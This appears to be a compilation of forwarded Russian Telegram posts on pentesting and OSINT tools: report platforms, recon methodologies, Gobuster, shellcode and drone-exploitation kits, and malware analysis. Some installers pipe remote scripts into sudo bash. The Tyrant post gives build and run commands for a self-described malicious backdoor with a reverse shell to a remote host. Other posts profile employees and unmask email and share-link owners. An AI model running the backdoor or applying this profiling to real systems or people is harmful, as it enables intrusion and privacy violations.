Forwarded from Codeby
Полностью настраиваемая платформа для составления отчетов о тестировании на проникновение, предназначенная для специалистов в области кибербезопасности.
Устанавливаем дополнительные компоненты, Docker и скачиваем установочный скрипт инструмента:
sudo apt update
sudo apt install -y sed curl openssl uuid-runtime coreutils
curl -fsSL https://get.docker.com | sudo bash
bash <(curl -s https://docs.sysreptor.com/install.sh)
Веб-приложение будет доступно по адресу
http://127.0.0.1:8000/Конструктор отчетов позволяет полностью настроить внешний вид и структуру итоговых отчетов в формате PDF. Ограничений по дизайну нет, поэтому вы можете адаптировать отчеты под свои нужды.
Существует два основных подхода к созданию отчетов:
Существует возможность использовать также и готовые фрагменты HTML и CSS, которые упрощают процесс создания отчетов. Они содержат часто используемые элементы отчетов (титульный лист, верхний и нижний колонтитулы, оглавление, список выводов, приложения и т. д.), которые можно легко настроить в соответствии с конкретными потребностями.
Одна из самых полезных функций для ИБ-специалистов, которая позволяет ускорить дальнейшую подготовку отчетов. Они содержат общие описания результатов и уязвимостей. Таким образом, описав результаты один раз в шаблоне, далее можно использовать их в различных отчетах.
#tools #reports #pentesting
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Osint Losena
** Credentials, leaks & cybercrime intelligence
🔹 Have I Been Pwned (Australia)
▪️ Website: https://haveibeenpwned.com/
▪️ Founded: 2013 г.
▪️ Founder(s): Troy Hunt
🔹 IntelligenceX (Czech Republic)
▪️ Website: https://intelx.io/
▪️ Founded: 2018 г.
▪️ Founder(s): Peter Kleissne
🔹 Leakix (Belgium)
▪️ Website: https://leakix.net/
▪️ Founded: 2021 г.
▪️ Founder(s): Danny Willems, Gregory Boddin
🔹 LeakRadar (France)
▪️ Website: https://leakradar.io/
▪️ Founded: Unknown г.
▪️ Founder(s): Alexandre Vandamme
🔹 Hudson Rock (Israel)
▪️ Website: https://hudsonrock.com/
▪️ Founded: 2020 г.
▪️ Founder(s): Roi Carthy
** Internet exposure & infrastructure intelligence
🔹 Shodan (United States)
▪️ Website: https://www.shodan.io/
▪️ Founded: 2009 г.
▪️ Founder(s): John Matherly
🔹 Censys (United States)
▪️ Website: https://www.censys.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Zakir Durumeric
🔹 Onyphe (France)
▪️ Website: https://www.onyphe.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Patrice Auffret
🔹 Netlas (Armenia)
▪️ Website: https://netlas.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Arthur Kotylevskiy
🔹 ZoomEye (China)
▪️ Website: https://www.zoomeye.ai/
▪️ Founded: 2013 г.
▪️ Founder(s): Not publicly listed
🔹 FOFA (China)
▪️ Website: https://en.fofa.info/
▪️ Founded: 2021 г.
▪️ Founder(s): Not publicly listed
🔹 CriminalIP (South Korea)
▪️ Website: https://www.criminalip.io/
▪️ Founded: 2023 г.
▪️ Founder(s): Byungtak Kang
🔹 VirusTotal (Spain (Google))
▪️ Website: https://www.virustotal.com/
▪️ Founded: 2004 г.
▪️ Founder(s): Bernardo Quintero
🔹 GreyNoise (United States)
▪️ Website: https://greynoise.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Andrew Morris
🔹 PulseDive (United States)
▪️ Website: https://pulsedive.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Dan Scary
🔹 urlscan.io (Germany)
▪️ Website: https://urlscan.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Johannes Gilger
🔹 Hunter.how (Unknown)
▪️ Website: https://hunter.how/
▪️ Founded: Unknown г.
▪️ Founder(s): Not disclosed
🔹 Have I Been Pwned (Australia)
▪️ Website: https://haveibeenpwned.com/
▪️ Founded: 2013 г.
▪️ Founder(s): Troy Hunt
🔹 IntelligenceX (Czech Republic)
▪️ Website: https://intelx.io/
▪️ Founded: 2018 г.
▪️ Founder(s): Peter Kleissne
🔹 Leakix (Belgium)
▪️ Website: https://leakix.net/
▪️ Founded: 2021 г.
▪️ Founder(s): Danny Willems, Gregory Boddin
🔹 LeakRadar (France)
▪️ Website: https://leakradar.io/
▪️ Founded: Unknown г.
▪️ Founder(s): Alexandre Vandamme
🔹 Hudson Rock (Israel)
▪️ Website: https://hudsonrock.com/
▪️ Founded: 2020 г.
▪️ Founder(s): Roi Carthy
** Internet exposure & infrastructure intelligence
🔹 Shodan (United States)
▪️ Website: https://www.shodan.io/
▪️ Founded: 2009 г.
▪️ Founder(s): John Matherly
🔹 Censys (United States)
▪️ Website: https://www.censys.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Zakir Durumeric
🔹 Onyphe (France)
▪️ Website: https://www.onyphe.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Patrice Auffret
🔹 Netlas (Armenia)
▪️ Website: https://netlas.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Arthur Kotylevskiy
🔹 ZoomEye (China)
▪️ Website: https://www.zoomeye.ai/
▪️ Founded: 2013 г.
▪️ Founder(s): Not publicly listed
🔹 FOFA (China)
▪️ Website: https://en.fofa.info/
▪️ Founded: 2021 г.
▪️ Founder(s): Not publicly listed
🔹 CriminalIP (South Korea)
▪️ Website: https://www.criminalip.io/
▪️ Founded: 2023 г.
▪️ Founder(s): Byungtak Kang
🔹 VirusTotal (Spain (Google))
▪️ Website: https://www.virustotal.com/
▪️ Founded: 2004 г.
▪️ Founder(s): Bernardo Quintero
🔹 GreyNoise (United States)
▪️ Website: https://greynoise.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Andrew Morris
🔹 PulseDive (United States)
▪️ Website: https://pulsedive.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Dan Scary
🔹 urlscan.io (Germany)
▪️ Website: https://urlscan.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Johannes Gilger
🔹 Hunter.how (Unknown)
▪️ Website: https://hunter.how/
▪️ Founded: Unknown г.
▪️ Founder(s): Not disclosed
🔥1
Forwarded from Заметки Хакер
🖥 Репозиторий: Sickle — Инструментарий для разработки и анализа полезных нагрузок
Sickle — это Payload Development Kit (PDK) для упрощения процесса создания, тестирования и форматирования шеллкодов.
— Позволяет быстро преобразовывать «сырой» байт-код в различные форматы (C, Python, Perl, Bash и др.), а также включает функции для поиска «плохих» символов и симуляции выполнения кода.
⏺ Ссылка на GitHub (https://github.com/wetw0rk/sickle-pdk)
#Exploit #ShellCode #Payload #RedTeam | Лаборатория хакера (https://max.ru/lab_hack)
@hackernews_lib
Sickle — это Payload Development Kit (PDK) для упрощения процесса создания, тестирования и форматирования шеллкодов.
— Позволяет быстро преобразовывать «сырой» байт-код в различные форматы (C, Python, Perl, Bash и др.), а также включает функции для поиска «плохих» символов и симуляции выполнения кода.
⏺ Ссылка на GitHub (https://github.com/wetw0rk/sickle-pdk)
#Exploit #ShellCode #Payload #RedTeam | Лаборатория хакера (https://max.ru/lab_hack)
@hackernews_lib
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пентестинг. Этичный хакинг.
🔎 Пассивная разведка сайта: как собрать инфу, не трогая цель разбираем тему, как и как и обещали в чате
Большинство думает, что пентест начинается со сканеров.
На деле — всё начинается с пассивной разведки.
👉 Пассивная разведка — это сбор информации БЕЗ взаимодействия с целью
(ты не отправляешь запросы на сервер)
Почему это важно?
— тебя не видно в логах
— можно найти уязвимости ещё до атаки
— формируется картина цели
📦 Что можно узнать:
• домены и поддомены
• IP-адреса
• используемые технологии
• открытые данные (утечки, репозитории)
• почты сотрудников
🛠 Инструменты:
— Amass
— theHarvester
— Shodan
— Censys
💡 Пример:
Ты находишь поддомен вида:
А там — тестовая среда без защиты. Уже можно черпать очень много информации.
Также, хотел бы вам посоветовать отличный репозиторий, содержащий перечень инструментов и ресурсов для сбора информации из открытых источников (OSINT).
🪧Информация о компании, которая может быть полезной:
Услуги — чем занимается компания?
Местоположение — где расположена компания?
Размер — какого размера компания?
Структура — какова структура компании и как взаимодействуют различные отделы?
Известность — насколько хорошо известна компания в мире?
Целевая аудитория — кому компания предоставляет свои услуги?
Маркетинг — как компания рекламирует свои услуги?
Активы — все ресурсы компании (офисы, веб-сайты, сетевая инфраструктура и т. д.).
Безопасность — какие меры безопасности предусмотрены для защиты активов компании?
Партнёры — с кем сотрудничает компания?
Вакансии — открыты ли вакансии в компании?
Полезная информация о сотруднике:
Должность — какие роли и обязанности выполняет сотрудник?
Зависимости — какие функциональные или рабочие зависимости существуют у сотрудника?
Контактные данные — номер телефона, адрес электронной почты, место проживания, псевдонимы и т.д.
Операционная система — какую операционную систему использует сотрудник для работы?
Активы — есть ли у сотрудника веб-сайт, блог, аккаунты в социальных сетях или какие-либо специфические приложения?
Интересы — какие у сотрудника личные увлечения, хобби или области интересов вне рабочих обязанностей?
Связи — с кем связан сотрудник?
🎯 Итог:
Пассивная разведка — это не просто этап «перед началом»,
это фундамент всей дальнейшей атаки.
Чем лучше ты собрал информацию на старте —
тем меньше тебе придётся «шуметь» дальше.
👉 Здесь решает не количество инструментов,
а умение связывать факты:
💡 кто хорошо делает OSINT —
тот уже на шаг впереди ещё до первого запроса к цели.
#osint #recon #пассивнаяраздведка
Большинство думает, что пентест начинается со сканеров.
На деле — всё начинается с пассивной разведки.
👉 Пассивная разведка — это сбор информации БЕЗ взаимодействия с целью
(ты не отправляешь запросы на сервер)
Почему это важно?
— тебя не видно в логах
— можно найти уязвимости ещё до атаки
— формируется картина цели
📦 Что можно узнать:
• домены и поддомены
• IP-адреса
• используемые технологии
• открытые данные (утечки, репозитории)
• почты сотрудников
🛠 Инструменты:
— Amass
— theHarvester
— Shodan
— Censys
💡 Пример:
Ты находишь поддомен вида:
dev.example.com
А там — тестовая среда без защиты. Уже можно черпать очень много информации.
Также, хотел бы вам посоветовать отличный репозиторий, содержащий перечень инструментов и ресурсов для сбора информации из открытых источников (OSINT).
🪧Информация о компании, которая может быть полезной:
Услуги — чем занимается компания?
Местоположение — где расположена компания?
Размер — какого размера компания?
Структура — какова структура компании и как взаимодействуют различные отделы?
Известность — насколько хорошо известна компания в мире?
Целевая аудитория — кому компания предоставляет свои услуги?
Маркетинг — как компания рекламирует свои услуги?
Активы — все ресурсы компании (офисы, веб-сайты, сетевая инфраструктура и т. д.).
Безопасность — какие меры безопасности предусмотрены для защиты активов компании?
Партнёры — с кем сотрудничает компания?
Вакансии — открыты ли вакансии в компании?
Полезная информация о сотруднике:
Должность — какие роли и обязанности выполняет сотрудник?
Зависимости — какие функциональные или рабочие зависимости существуют у сотрудника?
Контактные данные — номер телефона, адрес электронной почты, место проживания, псевдонимы и т.д.
Операционная система — какую операционную систему использует сотрудник для работы?
Активы — есть ли у сотрудника веб-сайт, блог, аккаунты в социальных сетях или какие-либо специфические приложения?
Интересы — какие у сотрудника личные увлечения, хобби или области интересов вне рабочих обязанностей?
Связи — с кем связан сотрудник?
🎯 Итог:
Пассивная разведка — это не просто этап «перед началом»,
это фундамент всей дальнейшей атаки.
Чем лучше ты собрал информацию на старте —
тем меньше тебе придётся «шуметь» дальше.
👉 Здесь решает не количество инструментов,
а умение связывать факты:
один поддомен → один email → один сотрудник → одна точка входа
💡 кто хорошо делает OSINT —
тот уже на шаг впереди ещё до первого запроса к цели.
#osint #recon #пассивнаяраздведка
Forwarded from Пентестинг. Этичный хакинг.
🔎 Мини-алгоритм пассивной разведки (OSINT)
Чтобы не тонуть в инструментах — я постарался обобщить все в мини-роудмап:
1️⃣ Определи цель
— домен / компания / ник
— зафиксируй все варианты (зеркала, поддомены, похожие названия)
2️⃣ Собери поверхность атаки
— домены и поддомены
— IP и хосты
— связанные сервисы
(через Amass, Censys)
3️⃣ Определи технологии
— CMS / фреймворки
— версии сервисов
— сторонние интеграции
4️⃣ Ищи открытые источники
— репозитории
— утечки
— документы
— кэш поисковиков
(через theHarvester, Shodan)
5️⃣ Собери людей и доступы
— сотрудники
— почты
— роли
— соцсети
6️⃣ Найди слабые точки
— dev / test / staging
— старые версии сайтов
— забытые сервисы
— лишняя информация в открытом доступе
7️⃣ Сделай pivot
— email → аккаунты
— домен → поддомены
— человек → компания → инфраструктура
🎯 Итог:
Пассивка — это не просто сбор данных,
а последовательная сборка пазла.
#osint #recon #пассивнаяраздведка
Чтобы не тонуть в инструментах — я постарался обобщить все в мини-роудмап:
1️⃣ Определи цель
— домен / компания / ник
— зафиксируй все варианты (зеркала, поддомены, похожие названия)
2️⃣ Собери поверхность атаки
— домены и поддомены
— IP и хосты
— связанные сервисы
(через Amass, Censys)
3️⃣ Определи технологии
— CMS / фреймворки
— версии сервисов
— сторонние интеграции
4️⃣ Ищи открытые источники
— репозитории
— утечки
— документы
— кэш поисковиков
(через theHarvester, Shodan)
5️⃣ Собери людей и доступы
— сотрудники
— почты
— роли
— соцсети
6️⃣ Найди слабые точки
— dev / test / staging
— старые версии сайтов
— забытые сервисы
— лишняя информация в открытом доступе
7️⃣ Сделай pivot
— email → аккаунты
— домен → поддомены
— человек → компания → инфраструктура
🎯 Итог:
Пассивка — это не просто сбор данных,
а последовательная сборка пазла.
#osint #recon #пассивнаяраздведка
Forwarded from Интернет-Розыск
Программируемая поисковая система Google PSE, ранее известная как Custom Search Engine (CSE), — это малоиспользуемый, но мощный инструмент для OSINT-расследований.
📎 https://programmablesearchengine.google.com/
PSE (Personal Service Except — поисковая оптимизация) — это ваша собственная, тщательно отобранная версия Google. Вместо поиска по всему интернету, она ищет только на конкретных сайтах, доменах или страницах, которые вы выберете. Google занимается индексированием в фоновом режиме, а вы определяете область поиска.
Подборки Google PSE для OSINT:
📎 https://github.com/paulpogoda/OSINT-CSE
📎 https://github.com/The-Osint-Toolbox/Custom-Search-Engines
📎 https://www.freesourcingtools.com/google-cse
📎 https://booleanstrings.com/all-the-40-forty-custom-search-engines/
📱 Telegram | 🌐 ВК | 📲 MAX
PSE (Personal Service Except — поисковая оптимизация) — это ваша собственная, тщательно отобранная версия Google. Вместо поиска по всему интернету, она ищет только на конкретных сайтах, доменах или страницах, которые вы выберете. Google занимается индексированием в фоновом режиме, а вы определяете область поиска.
Подборки Google PSE для OSINT:
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пентестинг. Этичный хакинг.
⚔️ Активная разведка сайта: когда ты начинаешь “стучаться” в цель
Если пассивка — это наблюдение,
то активная разведка — это уже действие.
👉 Активная разведка — это взаимодействие с целью
(ты отправляешь запросы → система может тебя заметить)
Почему это важно?
— получаешь реальные ответы от сервера
— находишь уязвимости, которые не видны в OSINT
— проверяешь гипотезы, собранные на пассивке
⚠️ Но есть нюанс:
— ты оставляешь следы в логах
— можешь триггернуть WAF / IDS
— без разрешения это может быть незаконно
📦 Что сюда входит:
• сканирование портов
• перебор директорий и файлов
• fuzzing параметров
• анализ ответов сервера
• поиск точек входа
🛠 Инструменты:
— Nmap
— Gobuster
— ffuf
— Burp Suite
💡 Пример:
Ты находишь поддомен через пассивку →
Дальше:
— сканируешь порты
— находишь admin-панель
— проверяешь параметры
И вот тут уже начинаются реальные уязвимости
🎯 Важно:
Активка без пассивки = стрельба в темноту
Активка после пассивки = точечный удар
#osint #активнаяраздведка
Если пассивка — это наблюдение,
то активная разведка — это уже действие.
👉 Активная разведка — это взаимодействие с целью
(ты отправляешь запросы → система может тебя заметить)
Почему это важно?
— получаешь реальные ответы от сервера
— находишь уязвимости, которые не видны в OSINT
— проверяешь гипотезы, собранные на пассивке
⚠️ Но есть нюанс:
— ты оставляешь следы в логах
— можешь триггернуть WAF / IDS
— без разрешения это может быть незаконно
📦 Что сюда входит:
• сканирование портов
• перебор директорий и файлов
• fuzzing параметров
• анализ ответов сервера
• поиск точек входа
🛠 Инструменты:
— Nmap
— Gobuster
— ffuf
— Burp Suite
💡 Пример:
Ты находишь поддомен через пассивку →
test.example.com
Дальше:
— сканируешь порты
— находишь admin-панель
— проверяешь параметры
И вот тут уже начинаются реальные уязвимости
🎯 Важно:
Активка без пассивки = стрельба в темноту
Активка после пассивки = точечный удар
#osint #активнаяраздведка
Forwarded from Пентестинг. Этичный хакинг.
🔎 Мини-алгоритм активной разведки (OSINT)
1️⃣ Берёшь данные с пассивки
— домены, поддомены
— IP и сервисы
— найденные dev/test точки
2️⃣ Проверяешь доступность
— какие хосты отвечают
— какие порты открыты
— какие сервисы реально доступны
👉 Отсекаешь всё лишнее
3️⃣ Определяешь сервисы
— сайт, API, админка?
— какие технологии используются
— есть ли WAF / защита
👉 Понимаешь, с чем имеешь дело
4️⃣ Ищешь скрытые директории
— /admin
— /login
— /api
— /backup
— /dev
👉 Очень часто здесь лежит самое интересное
5️⃣ Анализируешь ответы сервера
— коды ответов (200/403/404)
— размер ответа
— заголовки
— поведение при разных запросах
👉 Ищешь аномалии
6️⃣ Проверяешь точки ввода
— формы
— параметры
— API
— загрузки файлов
👉 Смотришь, как система обрабатывает данные
7️⃣ Тестируешь поведение
— нестандартные значения
— разные методы
— изменение запросов
👉 Ловишь ошибки логики
8️⃣ Выделяешь точки входа
— админки
— авторизация
— API
— старые сервисы
👉 Формируешь векторы атаки
🎯 Вывод:
Активная разведка — это не “запустить сканер и ждать”.
Это последовательная работа с гипотезами,
где каждый шаг сужает область поиска.
#osint #активнаяраздведка
1️⃣ Берёшь данные с пассивки
— домены, поддомены
— IP и сервисы
— найденные dev/test точки
2️⃣ Проверяешь доступность
— какие хосты отвечают
— какие порты открыты
— какие сервисы реально доступны
👉 Отсекаешь всё лишнее
3️⃣ Определяешь сервисы
— сайт, API, админка?
— какие технологии используются
— есть ли WAF / защита
👉 Понимаешь, с чем имеешь дело
4️⃣ Ищешь скрытые директории
— /admin
— /login
— /api
— /backup
— /dev
👉 Очень часто здесь лежит самое интересное
5️⃣ Анализируешь ответы сервера
— коды ответов (200/403/404)
— размер ответа
— заголовки
— поведение при разных запросах
👉 Ищешь аномалии
6️⃣ Проверяешь точки ввода
— формы
— параметры
— API
— загрузки файлов
👉 Смотришь, как система обрабатывает данные
7️⃣ Тестируешь поведение
— нестандартные значения
— разные методы
— изменение запросов
👉 Ловишь ошибки логики
8️⃣ Выделяешь точки входа
— админки
— авторизация
— API
— старые сервисы
👉 Формируешь векторы атаки
🎯 Вывод:
Активная разведка — это не “запустить сканер и ждать”.
Это последовательная работа с гипотезами,
где каждый шаг сужает область поиска.
#osint #активнаяраздведка
Forwarded from Codeby
Tyrant
📐 Основные характеристики:
📉 Reverse shell: позволяет злоумышленнику инициировать сеанс командной оболочки с указанным UID пользователя, получая соответствующие привилегии.
📉 Внедрение и сохранение бэкдора: внедряет бэкдор в целевую систему и обеспечивает сохранение контроля даже после перезагрузки системы.
📉 Загрузка веб-оболочки Tyrant: загружает и запускает обратную оболочку Tyrant через веб-доступ.
📉 Шифрование и поддельные протоколы: использует поддельные токены JWT и зашифрованную связь для обхода обнаружения системы безопасности.
🖱 Восстановление по SSH: позволяет злоумышленнику повторно подключиться и восстановить бэкдор через SSH.
⬇️ Установка:
0️⃣ Клонирование репозитория и переход в рабочую директорию:
1️⃣ Установка зависимостей:
2️⃣ Компиляция бинарного файла:
⛓️💥 Запуск:
#web
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Tyrant — это вредоносный инструмент, используемый для тестирования на проникновение и обеспечения постоянного присутствия под удаленным управлением, обладающий обширными возможностями.
git clone https://github.com/MartinxMax/Tyrant.git
cd Tyrant/
sudo apt-get install zlib1g-dev libzstd-dev libssl-dev
gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd
./tyrant -uid [UID] -rhost [RHOST] -rport [RPORT]
#web
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пентестинг. Этичный хакинг.
🛠 Gobuster: как находить скрытые директории и поддомены
Одна из самых частых ошибок новичков —
думать, что если страница не видна, значит её нет.
👉 На практике —она просто скрыта .
📌 Gobuster:
— перебирает директории (
— ищет скрытые файлы
— может находить поддомены
💡 Пример:
📦 Что можно найти:
• админ-панели
• тестовые разделы
• резервные копии
• скрытые API
• забытые страницы
⚡️ Важно:
— хороший словарь = 50% успеха
— не все 200 ответы полезны
— обращай внимание на размер ответа
— фильтруй мусор
💣 Частая ошибка:
Запустить Gobuster “в лоб” без пассивки
👉 Запомни:
сначала собрать поддомены →
потом уже брутить директории точечно
🔥 Мини-лайфхаки:
— проверяй
— используй разные словари
— смотри не только на статус, но и на контент
— ищи нестандартные ответы
🎯 Вывод:
Gobuster — это не просто перебор слов,
а инструмент для поиска скрытых точек входа.
#tools #gobuster
Одна из самых частых ошибок новичков —
думать, что если страница не видна, значит её нет.
👉 На практике —
📌 Gobuster:
— перебирает директории (
/admin, /backup, /dev)— ищет скрытые файлы
— может находить поддомены
💡 Пример:
gobuster dir -u http://target.com -w wordlist.txt
📦 Что можно найти:
• админ-панели
• тестовые разделы
• резервные копии
• скрытые API
• забытые страницы
⚡️ Важно:
— хороший словарь = 50% успеха
— не все 200 ответы полезны
— обращай внимание на размер ответа
— фильтруй мусор
💣 Частая ошибка:
Запустить Gobuster “в лоб” без пассивки
👉 Запомни:
сначала собрать поддомены →
потом уже брутить директории точечно
🔥 Мини-лайфхаки:
— проверяй
/robots.txt перед запуском— используй разные словари
— смотри не только на статус, но и на контент
— ищи нестандартные ответы
🎯 Вывод:
Gobuster — это не просто перебор слов,
а инструмент для поиска скрытых точек входа.
#tools #gobuster
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Cyber Detective
Best OSINT resources
List by OsintTeamBlog (updated last month):
Youtube channels
Newsletters
Blogs
Podcasts
CTFs and hackathons
https://www.osintteam.com/resources/
List by OsintTeamBlog (updated last month):
Youtube channels
Newsletters
Blogs
Podcasts
CTFs and hackathons
https://www.osintteam.com/resources/
Forwarded from Интернет-Розыск
Меня часто спрашивают: можно ли хоть что-то узнать об анонимном почтовом ящике Protonmail, кроме самого адреса? Короткий ответ — да, кое-что можно. Не пароль, не переписку, конечно, но технические метаданные — вполне.
Сегодня покажу простой способ получить дату и время создания ящика. Это не взлом и не «пробив» в классическом понимании, а легальный запрос к открытому API Protonmail. Такая информация бывает полезна в расследовании: например, вы видите, что ящик создан через час после какого-то события, или, наоборот, существовал уже несколько лет. Цепочка косвенных улик иногда говорит больше, чем прямой ответ. Метод работает для большинства активных ящиков Protonmail, если пользователь не отключил публичный PGP-ключ (по умолчанию он включён).
Пусть у нас есть ящик: gabaigaduka@protonmail.com. Мы не знаем, кто за ним стоит, но хотим понять, когда его зарегистрировали. Protonmail предоставляет публичный эндпоинт для проверки PGP-ключей. В том числе через него можно получить метаинформацию о ящике. Вбиваем в браузере или через curl такой URL:
В ответ приходит несколько строк. Нас интересует та, что начинается с pub:. В ней есть числовая метка — Unix timestamp.
Видите число 1527584191? Это и есть время создания ящика в секундах, прошедших с 1 января 1970 года. Только выглядит оно не очень читаемо. Идём на сайт epochconverter.com (или любой другой онлайн-конвертер Unix timestamp). Вставляем туда 1527584191 и получаем 29 мая 2018 года, около 15:36 по UTC. То есть ящик создан в конце весны 2018-го. Уже что-то.
📱 Telegram | 🌐 ВК | 📲 MAX
Сегодня покажу простой способ получить дату и время создания ящика. Это не взлом и не «пробив» в классическом понимании, а легальный запрос к открытому API Protonmail. Такая информация бывает полезна в расследовании: например, вы видите, что ящик создан через час после какого-то события, или, наоборот, существовал уже несколько лет. Цепочка косвенных улик иногда говорит больше, чем прямой ответ. Метод работает для большинства активных ящиков Protonmail, если пользователь не отключил публичный PGP-ключ (по умолчанию он включён).
Пусть у нас есть ящик: gabaigaduka@protonmail.com. Мы не знаем, кто за ним стоит, но хотим понять, когда его зарегистрировали. Protonmail предоставляет публичный эндпоинт для проверки PGP-ключей. В том числе через него можно получить метаинформацию о ящике. Вбиваем в браузере или через curl такой URL:
https://api.protonmail.ch/pks/lookup?op=index&search=gabaigaduka@protonmail.com
В ответ приходит несколько строк. Нас интересует та, что начинается с pub:. В ней есть числовая метка — Unix timestamp.
info:1:1
pub:cc0322777176da3a4a4d9916e4f32c96c55663a4:1:2048:1527584191::
uid:gabaigaduka@protonmail.com <gabaigaduka@protonmail.com>:1527584191::
Видите число 1527584191? Это и есть время создания ящика в секундах, прошедших с 1 января 1970 года. Только выглядит оно не очень читаемо. Идём на сайт epochconverter.com (или любой другой онлайн-конвертер Unix timestamp). Вставляем туда 1527584191 и получаем 29 мая 2018 года, около 15:36 по UTC. То есть ящик создан в конце весны 2018-го. Уже что-то.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Интернет-Розыск
Сколько раз мы с вами сталкивались с одной и той же проблемой: нужно быстро подобрать инструмент под конкретную задачу, а в закладках — сотни ссылок, половина из которых мертва, а вторая — просто бесполезна. Где-то лежит один парсер, где-то — другой, а вспомнить, чем ты пользовался в прошлом кейсе, уже нереально.
The OSINT Tools Library — tools.osintnewsletter.com
📱 Telegram | 🌐 ВК | 📲 MAX
The OSINT Tools Library — tools.osintnewsletter.com
Это не очередная простыня из «100500 инструментов для всех случаев». Авторы подошли к делу с практической стороны: каталог курируется под конкретные задачи расследователя. Внутри — только то, что реально применялось в делах, а не скопировано с соседнего сайта.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Codeby
Qu1cksc0pe: Многофункциональный инструмент для статического и динамического анализа вредоносного ПО
🧿 Поддерживаемые форматы файлов
- Windows (.exe, .dll, .msi, .bin)
- Linux (.elf, .bin)
- macOS (mach-o)
- Android (.apk, .jar, .dex)
- Документы (.doc, .docm, .docx, .xls, .xlsx, .pdf, .rtf, .one)
- Скрипты (VBScript/VBA (.vbs, .vbe, .vba), PowerShell)
- Архивы (.zip, .rar)
⬇️ Установка
Проверка
⏺️ Базовый анализ
⏺️ Быстрый анализ подозрительного EXE-файла
⏺️ Глубокий анализ документа с извлечением макросов
⏺️ Проверка APK на наличие вредоносного поведения
⏺️ Пакетное сканирование коллекции образцов
⏺️ Извлечение индикаторов компрометации
#Qu1cksc0pe #StaticAnalysis #DynamicAnalysis #tool #pentest #MITRE
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Qu1cksc0pe — это универсальная платформа с открытым исходным кодом для статического и динамического анализа вредоносного программного обеспечения. Инструмент предназначен для исследования широкого спектра файлов: от исполняемых binaries Windows, Linux и macOS до документов, APK-файлов, архивов и сценариев PowerShell. Основная цель — предоставить исследователям безопасности максимальный объем информации о подозрительных файлах, помогая понять их функциональность и потенциальные угрозы.
- Windows (.exe, .dll, .msi, .bin)
- Linux (.elf, .bin)
- macOS (mach-o)
- Android (.apk, .jar, .dex)
- Документы (.doc, .docm, .docx, .xls, .xlsx, .pdf, .rtf, .one)
- Скрипты (VBScript/VBA (.vbs, .vbe, .vba), PowerShell)
- Архивы (.zip, .rar)
pipх install quickscope
Проверка
quickscope -h
python quickscope --file suspicious_file.exe --analyze
python quickscope --file unknown_sample.exe --analyze --vtFile
python quickscope --file invoice.doc --docs
#cтатический анализ
python quickscope --file malicious.apk --analyze
#динамический анализ (с подключенным устройством)
python quickscope --file malicious.apk --watch
python quickscope --folder ./malware_collection --hashscan
python quickscope --file suspicious_sample.exe --analyze --report | jq '.iocs'
#Qu1cksc0pe #StaticAnalysis #DynamicAnalysis #tool #pentest #MITRE
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Soxoj insides (Soxoj)
🎭 ShareTrace: reveal the identity behind any share link
Works for 12 platforms: TikTok, Instagram, Discord, Google Drive, Notion, Telegram, Pinterest, Substack, Suno, ChatGPT, Claude, Perplexity.
Original repo was deleted — I rebuilt it with new platforms and fixes.
👉 https://github.com/soxoj/sharetrace
Works for 12 platforms: TikTok, Instagram, Discord, Google Drive, Notion, Telegram, Pinterest, Substack, Suno, ChatGPT, Claude, Perplexity.
Original repo was deleted — I rebuilt it with new platforms and fixes.
👉 https://github.com/soxoj/sharetrace
Forwarded from Заметки Хакер
🖥 Репозиторий: Dronesploit — фреймворк для пентестинга и эксплуатации уязвимостей дронов
Dronesploit — это комплексный набор инструментов и фреймворк, разработанный для анализа безопасности беспилотных летательных аппаратов (БПЛА).
— Он предоставляет исследователям безопасности и пентестерам средства для выявления, изучения и эксплуатации потенциальных уязвимостей в системах дронов, а также для оценки их защищенности от различных атак.
Включает модули для разведки, сканирования и эксплуатации различных протоколов связи дронов; поддерживает множество производителей и моделей БПЛА; предоставляет инструменты для перехвата данных, спуфинга GPS и других методов атаки; предназначен для этичного тестирования безопасности и научных исследований.
⏺ Ссылка на GitHub (https://github.com/dronesploit/dronesploit)
#Cybersecurity #IoT #Pentest #Hacking #OpenSource #Drone | Лаборатория хакера (https://max.ru/lab_hack)
@hackernews_lib
Dronesploit — это комплексный набор инструментов и фреймворк, разработанный для анализа безопасности беспилотных летательных аппаратов (БПЛА).
— Он предоставляет исследователям безопасности и пентестерам средства для выявления, изучения и эксплуатации потенциальных уязвимостей в системах дронов, а также для оценки их защищенности от различных атак.
Включает модули для разведки, сканирования и эксплуатации различных протоколов связи дронов; поддерживает множество производителей и моделей БПЛА; предоставляет инструменты для перехвата данных, спуфинга GPS и других методов атаки; предназначен для этичного тестирования безопасности и научных исследований.
⏺ Ссылка на GitHub (https://github.com/dronesploit/dronesploit)
#Cybersecurity #IoT #Pentest #Hacking #OpenSource #Drone | Лаборатория хакера (https://max.ru/lab_hack)
@hackernews_lib
Forwarded from Codeby
WebSift
📐 Функции
📉 Собирает адреса электронной почты с заданного веб-сайта.
📉 Извлекает номера телефонов в стандартных форматах.
📉 Собирает ссылки на социальные сети и другие URL-адреса с веб-сайтов для расширения возможностей OSINT.
🖱 Сохраняет извлеченную информацию для дальнейшего анализа.
⬇️ Установка:
🔗 Клонируем репозиторий и переходим в рабочую директорию:
⛓️💥 Запуск:
#web #pentest #OSINT
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
